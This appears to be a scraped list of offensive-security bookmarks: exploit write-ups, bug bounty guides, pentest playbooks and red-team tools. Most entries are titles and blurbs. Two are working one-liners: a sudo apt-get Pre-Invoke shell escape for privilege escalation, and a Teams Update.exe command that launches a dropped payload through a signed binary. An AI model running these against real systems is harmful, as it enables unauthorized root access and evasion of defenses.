Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - dirkjanm.io
https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/
dirkjanm.io
Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin
Earlier this week, Microsoft issued patches for CVE-2019-1040, which is a vulnerability that allows for bypassing of NTLM relay mitigations. The vulnerability was discovered by Marina Simakov and Yaron Zinar (as well as several others credited in the Microsoft…
Using Nmap to extract Windows host and domain information via RDP | Faded Lab
https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/
Faded Lab
Using Nmap to extract Windows host and domain information via RDP
I’ve recently spent some time in various code bases working on Windows RDP related discovery. This post is going to talk about using a new Nmap script, rdp-ntlm-info.nse, against RDP services…
Guide 001 | Getting Started in Bug Bounty Hunting..
1. Basics of Networks, Programming & Automation
2. Learning about Vulnerabilities, Resource for practicing, Tools…
3. Selecting a target, starting tests & writing reports
https://t.co/XK5eR2zm8h
Muhammad Khizer Javed
Guide 001 | Getting Started in Bug Bounty Hunting..
A Noobs Guide to Getting Started in Bug Bounty Hunting | Muhammad Khizer Javed, whoami.securitybreached.org | aslicybersecurity.com | @KHIZER_JAVED47 No one will tell you anything or everything abo…
Linux for Pentester: APT Privilege Escalation
Exploiting Sudo rights: Method -I
sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash https://t.co/iv7saeYsr6
Twitter
김진욱
GitHub - sdcampbell/Internal-Pentest-Playbook: Internal Network Penetration Test Playbook
https://github.com/sdcampbell/Internal-Pentest-Playbook
GitHub
Internal Network Penetration Test Playbook. Contribute to sdcampbell/Internal-Pentest-Playbook development by creating an account on GitHub.
GitHub - emadshanab/WordLists-20111129: A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose.
https://github.com/emadshanab/WordLists-20111129
GitHub
A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose. - emadshanab/WordLis...
GitHub - dukebarman/ghidra-builder: Docker image for building ghidra RE framework from source
https://github.com/dukebarman/ghidra-builder
GitHub
Docker image for building ghidra RE framework from source - dukebarman/ghidra-builder
The Return of the WIZard: RCE in Exim - GlitchWitch.IO
https://glitchwitch.io/blog/2019-06/exploiting-cve-2019-10149/
How to Upgrade Your XSS Bug from Medium to Critical
https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4
Medium
How to Upgrade Your XSS Bugs from Medium to Critical
Some ways to effectively leverage XSS vulnerabilities to increase severity, and some canned payloads to hack popular frameworks!
Magic Unicorn 3.8.1 released.
Adds new method for platform detection, obfuscation, and a fix for python2 raw_input when using AMSI bypass.
https://t.co/YeXwYojd5l
GitHub
trustedsec/unicorn
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique...
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\
Then
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"
Trusted signed binary will run the payload for you 😊
Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources · GitHub
https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md
GitHub
Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources
A big list of Android Hackerone disclosed reports and other resources. - B3nac/Android-Reports-and-Resources
Finding and Testing MisConfigured S3 Buckets ! - Rohan Chavan - Medium
https://medium.com/@rohanchavan/finding-and-testing-misconfigured-s3-buckets-d77992c4b5cd
Medium
Finding and Testing MisConfigured S3 Buckets.
A guide to find misconfigured s3 buckets for #BugBounty.
GitHub - securityidiots/CollabOzark: CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers.
https://github.com/securityidiots/CollabOzark
GitHub
CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers. - GitHub - securityidiots/CollabOzark: CollabOzark is a simple ...
GitHub - RedTeamOperations/PivotSuite: Network Pivoting Toolkit
https://github.com/RedTeamOperations/PivotSuite
GitHub
Network Pivoting Toolkit. Contribute to RedTeamOperations/PivotSuite development by creating an account on GitHub.